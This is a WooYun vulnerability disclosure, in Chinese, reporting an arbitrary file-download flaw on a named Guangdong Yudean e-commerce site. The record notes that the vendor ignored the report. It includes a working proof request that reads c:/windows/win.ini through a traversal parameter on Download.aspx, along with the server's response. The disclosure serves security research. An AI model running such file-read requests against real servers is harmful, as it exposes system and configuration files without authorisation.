当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024013

漏洞标题:粤电商务网文件包含读取漏洞

相关厂商:gdydb2b.com

漏洞作者: 霍大然

提交时间:2013-05-24 14:51

修复时间:2013-05-29 14:52

公开时间:2013-05-29 14:52

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-24: 细节已通知厂商并且等待厂商处理中
2013-05-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

粤电商务网作为粤电集团信息战略规划的重要内容之一,是公司商务工作对外的门户。按照粤电集团整体信息战略规划,随着公司信息化进程的推进,电子商务平台将在公司范围内实现和生产、销售、基建相关业务流程的融合以及EAM等相关信息系统的集成。将内部管理系统与外部管理系统融合,充分利用外部资源,提升管理信息的数字化水平,实现资源共享。

详细说明:

攻击者可以通过web系统查看win2008服务器系统上的各种文件的内容,可能使其可以恢复应用程序源代码、系统配置文件信息。

漏洞证明:

request:
GET /Document/Download.aspx?FN=c:/windows\\win.ini HTTP/1.1
Referer: http://www.gdydb2b.com:80/Article/ArticleFileList.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: */*
Pragma: no-cache
Host: www.gdydb2b.com
response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/unknown; charset=utf-8
Server: Microsoft-IIS/7.5
Content-disposition: attachment;filename=win.ini
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 17 May 2013 12:20:05 GMT
Content-Length: 403
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

修复方案:

修改提交方式

版权声明:转载请注明来源 霍大然@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-05-29 14:52

厂商回复:

最新状态:

暂无


漏洞评价:

评论